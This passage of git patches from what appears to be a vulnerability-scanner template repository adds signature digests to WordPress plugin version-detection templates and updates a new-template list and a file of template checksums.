@@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2679103f12c5195888460d5601e20131a76b913b3b5532e2d43b9be733032b8022100908072c4528bcf458104764c42a66445d367e098ace569b7bd4c0bde2b950271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..5026f17708 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d881b1ad00dbb77fd45bb72840484cf19010b5b45d3978299094294c24750bf902200eb298ec7326a86e529115b07a7925aef4366dfbc7adbe5918df4730addeff00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 7b28bf7020..8937d80534 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047e53689dcd8d1e2a5a7504a89b109e666ca9245288d1d7e18dd6ac81656328402204e35f472ff3fe704998274f965edad632258d3fa0eb30e2002ca4640039c26fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index da6abc2a81..9ba3f5cf2a 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d78a1a21573d405bdd8f4b21242c811fc2eb8f22f3d5246e7ce9290508ae5a602201cf1dfdcc98a8f35a10545d270d0df2250b06a73a5310f9851e8bbb7945436e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..7f542d3108 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008d8a80f047a4f06fa4ee6d5b1977597a5bc9a12f1d35a570fa6ea34764b794e4022062ee1198240932f62d94af38f6db68333f262cb2746e64df0cbca45b347bce6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..b3f1723b08 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013d96e845d891ad070f6641163fc3f56cfe50d6f4746c6beb4b98b4a27849a0802202fef6a4759872ae603c14979fae1f53427f838a3a92eb4135cd78aed0d4019a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..aaf146d753 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204eab91b8e139244cd5ec1e7cdc5ce551807b9d3178a4aa54473766a5aacf7c15022100ad2d401aa5fe51315eeca203bb200264d9a6fd176a169bf6cbb55833d13fb959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..0cd256279b 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220481c6d08e81ba639311ef081c10abdb3d7a40e104145feb8d374f6df6c7943ef02203e670dc65b6b5dafc8bb7215a6cb3346b60bdaccb08742cdf4329e33aaa78736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..12ec187fa1 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220186ca11cbcd320703cd0bf3168cb29bbdcd17f8caf43f5923e40698bcd27650e022011fd48560e62b7cbe218d47ae597b3bdd1988f57c63524582b2d9addc5c17f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..f6b6ea26ff 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100df99f34a54a4c72f041d85a4f481b01103d7ce41a57567f92589521ba8f76829022042a1475bfe4c4bbd3e05ae2a2deb50475a47c2907844a3d4bb7825791f38680d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..2bf25504ca 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca0acdc11506e356cf7488278b9ee2554c28405e5d8c93a2cf440294785d554a0220230f0021e464a32be53525f5499dcd3a12060c7000f02ec727966914f22571b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 86850fcdd38b338956f649adef1f9d555bb8e174 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 05:39:09 +0000 Subject: [PATCH 0484/1841] Auto Generated New Template Addition List [Fri Jun 21 05:39:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ed29b13b27..32ec7b9600 100644 --- a/.new-additions +++ b/.new-additions @@ -33,6 +33,7 @@ http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-3274.yaml http/cves/2024/CVE-2024-34982.yaml http/cves/2024/CVE-2024-3552.yaml +http/cves/2024/CVE-2024-36412.yaml http/cves/2024/CVE-2024-36837.yaml http/cves/2024/CVE-2024-37393.yaml http/default-logins/mantisbt/mantisbt-anonymous-login.yaml From b10ceb1d2a8d468d2b2e0290aa5c0f50251ea74b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 05:39:13 +0000 Subject: [PATCH 0485/1841] Auto Generated Templates Checksum [Fri Jun 21 05:39:13 UTC 2024] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c6ec9921a5..047bc6571c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3330,7 +3330,7 @@ http/cves/2024/CVE-2024-28995.yaml:2256abea0b23dd20789317702178afdd5ceb4225 http/cves/2024/CVE-2024-29059.yaml:8339d52df93cf5aa744acd122780080e989fe7ca http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-29824.yaml:46f1ec812df6008b68dadfc51bc4453cbeda7539 -http/cves/2024/CVE-2024-29895.yaml:8ce82f00f02e3628feaefd928f43a371c9a25bb7 +http/cves/2024/CVE-2024-29895.yaml:4a7c770772a2e16187ed8e70815f27e897ae7c52 http/cves/2024/CVE-2024-29973.yaml:e44f85b0fe7297f9b0ed996a2e9c7ca9e985fdb9 http/cves/2024/CVE-2024-3097.yaml:b45cd14894d2dd544156fa7b88ec579b871834a9 http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 @@ -3355,6 +3355,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e +http/cves/2024/CVE-2024-36412.yaml:4f4ee1ed6a60a21f8cdb2f8ba790b77f65e49f99 http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -7115,227 +7116,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:b3d7616fd31257d474679ca37a41996d4bedc532 +http/technologies/wordpress/plugins/add-to-any.yaml:c9fcf9f4160bd82dba7094694eb45003cbfce3a2 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:2a3371bd4fa70dcd56db99dd9207e1f6c7ca3f41 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:ae285f7dcbc8fa81301d1b04b2ec7ffd5a4664c5 +http/technologies/wordpress/plugins/akismet.yaml:2fe78615872f84f30bb3ee5b65a7428ef55862f2 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:eb2d239e57dc3353581cc430cfc10498c1f4ad90 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:edf9d06299d702f2f2ffe2da8ed48bde284fcd12 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:2538976db522947ec22504fb1adcef04a919a9a0 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:b63e9a23b264c499e3a9b6f3352e7b83cefb6c4e +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:ccfec0a329458f1e079356d3ea61bb99e1865fb7 +http/technologies/wordpress/plugins/amp.yaml:08ccac408309c3818206141027a03161e9408711 +http/technologies/wordpress/plugins/antispam-bee.yaml:aee910670492376b85aa62d0caf838738b90160f +http/technologies/wordpress/plugins/astra-sites.yaml:33f2e9420ba703459e5dbd682eacaefb6fbd640f http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:03a36d4b749ffe5c9b2a6782397b3363cf878304 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:cd651c83f08f229cb414b7151f8045287dc54fec -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:ba158b0c07f834036879b648d0ac509bea1a2bc3 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/autoptimize.yaml:4b53509bd734b58620972a0963acb3b3468ee418 +http/technologies/wordpress/plugins/backwpup.yaml:7a3921d87d273067ce762612220dd99be7d68e63 +http/technologies/wordpress/plugins/better-search-replace.yaml:aea43a162f70e01a2f9a15cf6825d8ae10324349 +http/technologies/wordpress/plugins/better-wp-security.yaml:a3269328cb7c2936eae164e892a6fccb3b0809b4 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:f792d6481f905fa53fe7810be4c150dabd59f12a +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:98d54d404b363f5feca0ffef7dc1f1ea4906aab1 +http/technologies/wordpress/plugins/breeze.yaml:2e4c6b008ff66ce6d029e6fc39a8553c7f99fb55 +http/technologies/wordpress/plugins/broken-link-checker.yaml:5da1626717fb00dbee41987a5db4d197759ded62 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:bf8d3c6c6de76da5aa40f0cb0100b1b92e87f26b +http/technologies/wordpress/plugins/classic-editor.yaml:e953c812d82e6de32b15fc9b3a278aaa6c602928 +http/technologies/wordpress/plugins/classic-widgets.yaml:e247d9108451fd222157ee61d6fbd4c80b79447b +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:dc106890e172dc2d16ece701f303615378d36b66 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 +http/technologies/wordpress/plugins/cmb2.yaml:5128485c1b9d932abf6c476a33977855fe98d97e +http/technologies/wordpress/plugins/coblocks.yaml:44d23b03ea0a3e27c072a791d60547aeb9458bc1 +http/technologies/wordpress/plugins/code-snippets.yaml:e8068068950129712bc1cf34caaaa50115c13d11 +http/technologies/wordpress/plugins/coming-soon.yaml:8bdc6e4bf88ad3a8f168977f58d098d539fecd02 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:d6d98fdf51761f8ec19675e6d7f646ac8813c11e +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:5d9dbe92dfeb5557926964381918a81f3617edb9 +http/technologies/wordpress/plugins/contact-form-7.yaml:a0a8090ffb4230ef0d304cc2b923c042397e2dbe +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:8e89b80e20152966ea3cc26410ec4fcdbbe8eb8f +http/technologies/wordpress/plugins/cookie-law-info.yaml:2e449d46553c537823542009a4fde4b734ee40ed +http/technologies/wordpress/plugins/cookie-notice.yaml:9e8ff2bf8482dbd852c9365e49b2b46bf73305eb +http/technologies/wordpress/plugins/copy-delete-posts.yaml:29ec284e0c013df0bd10648d2ba15fd995a0a269 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:618de5b95f3e730d13929f6f32f5fdec4e8812e1 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:52c5cedf7266da80073d290b8416764bbe94620c +http/technologies/wordpress/plugins/custom-css-js.yaml:5b2ce9d87268b2acc343b20a1bc6d8096af11be5 +http/technologies/wordpress/plugins/custom-fonts.yaml:374f3b2082b559715f2c2a461ed25494f4a88d7b +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:21a6eb257a6989d6fe764ce0fee8b4721def1dc8 +http/technologies/wordpress/plugins/disable-comments.yaml:e6f2bafddd0f113edb3e8b18786b16d487eabddf +http/technologies/wordpress/plugins/disable-gutenberg.yaml:2d570dea9ecdf731e0ca18e88a73fe46491e9d26 +http/technologies/wordpress/plugins/duplicate-page.yaml:b201f066f3039fbfbbae79baa3df5f4fe31e3d1b +http/technologies/wordpress/plugins/duplicate-post.yaml:0c794bd083df075bcc4d54c1998aba8cefa5168e +http/technologies/wordpress/plugins/duplicator.yaml:bed5dbb79d77384d5ea23e8d51397accb7f9625c +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:733840cd7e4bbea24d48ee9d7bb71f0700bb6ce6 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:f4b5da62ed02982e01bc3039c3e15be94a167341 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:b6b11e5617051924a10baa40f95e493359ca3d4f +http/technologies/wordpress/plugins/elementor.yaml:f4edefb4f8ca9185b46d73e0b732b37d56bd1dd2 +http/technologies/wordpress/plugins/elementskit-lite.yaml:7614826894e92dc95bd95b82fc0f6cdce3abe5cb +http/technologies/wordpress/plugins/enable-media-replace.yaml:4cf1821cf2a5a59f7e60df144faf9c60ba9b6e94 +http/technologies/wordpress/plugins/envato-elements.yaml:94065f5a84f5321046be551485213d3c5c63976a +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:f14043884c8205abbc3e70a286cc25f71b9abb5d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b4190a0f9df8514c19dbe8d487942213aa9fc49d +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:a6ba1f1a0608eac090bcf6de84262f610a85e68b +http/technologies/wordpress/plugins/fast-indexing-api.yaml:47b1fbf4dd2cd2f171a3d3e24b6ca31253ca821e +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:0f43c2d8cc7ef1cd1020753992a9024297e31b5b +http/technologies/wordpress/plugins/flamingo.yaml:2e5e7062cc8c4d2c01d6e3d3b7ff93401aa4eb65 +http/technologies/wordpress/plugins/fluentform.yaml:a815ca53606dea0a793024389b4aa2948a8751df +http/technologies/wordpress/plugins/font-awesome.yaml:ad3d904ee116447a49b3a319b67529c7b7c346d3 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b28c7006d5f707e7541b6c0d43c854a18696def8 +http/technologies/wordpress/plugins/formidable.yaml:ebb5b90b1dacabf4bd11571c616d61706fdd24b2 +http/technologies/wordpress/plugins/forminator.yaml:a7b8ae5058293a734030a6c6c195f41f2ea00d9f +http/technologies/wordpress/plugins/ga-google-analytics.yaml:4ba5366536a1ab35f5fb63f7a0224b9798a966e4 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:be003aaaa9879ba69f0db8793276b71377af2575 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:1978e15fe77dbcfa34ba21dc6302b3a07b948468 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:e0b9cac91da2b5860fed56a7b4f3c6dc30e4c2f9 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:fd8daa309455226ef6b65989fea8cbaf2e81eb13 +http/technologies/wordpress/plugins/google-site-kit.yaml:833558144003842dd23fd8f3c72d22c5b8bc0e79 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:3fc4b98979519856b73d63d8333f64ff41349635 +http/technologies/wordpress/plugins/gtranslate.yaml:e12c291af670cc0eb3779122933e06202045bc30 +http/technologies/wordpress/plugins/gutenberg.yaml:c833d5630c1b058d7d9a44032845354f70d31b72 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:416ecfa2bb058efb203aa7e90a9f258bfb2bde85 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 -http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 -http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:59edf3b89ad82ab61f39126342d4989608073055 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:5170d3827f4a8b8b479ec237ccb452a623d8f7fd 